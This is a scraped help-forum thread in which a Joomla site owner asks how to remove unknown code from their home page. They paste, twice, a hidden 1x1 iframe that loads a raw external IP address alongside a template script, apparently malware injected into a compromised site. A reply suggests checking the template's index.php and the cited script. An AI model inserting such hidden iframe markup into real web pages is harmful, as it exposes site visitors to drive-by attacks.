Accessing Code On My Home Page - Joomla! Forum - community, help and support
i can see code added home page in iframe , want remove it. however, when review articles, modules, plugins, etc can find code. below code @ bottom of source page. want remove iframe in src="http://88.198.219.85". let me know if more information required respond question.
</div><!-- wrapper-page -->
<script language="javascript" type="text/javascript">
function iframeheight() {
var h = 0;
if ( !document.all ) {
h = document.getelementbyid('blockrandom').contentdocument.height;
document.getelementbyid('blockrandom').style.height = h + 60 + 'px';
} else if( document.all ) {
h = document.frames('blockrandom').document.body.scrollheight;
document.all.blockrandom.style.height = h + 20 + 'px';
}
}
</script>
<iframe onload="iframeheight()" id="blockrandom"
name=""
src="http://88.198.219.85"
width="1"
height="1"
scrolling="auto"
align="top"
frameborder="0"
class="wrapper">
no iframes</iframe>
<script type="text/javascript" src="/templates/fhg/js/ppt.js"></script>
</div><!-- wrapper-page -->
<script language="javascript" type="text/javascript">
function iframeheight() {
var h = 0;
if ( !document.all ) {
h = document.getelementbyid('blockrandom').contentdocument.height;
document.getelementbyid('blockrandom').style.height = h + 60 + 'px';
} else if( document.all ) {
h = document.frames('blockrandom').document.body.scrollheight;
document.all.blockrandom.style.height = h + 20 + 'px';
}
}
</script>
<iframe onload="iframeheight()" id="blockrandom"
name=""
src="http://88.198.219.85"
width="1"
height="1"
scrolling="auto"
align="top"
frameborder="0"
class="wrapper">
no iframes</iframe>
<script type="text/javascript" src="/templates/fhg/js/ppt.js"></script>
i check template's index.php file... remove or rename javascript file "ppt.js" that's cited , may possibly remove effects (not code necessarily) of iframe.
Comments
Post a Comment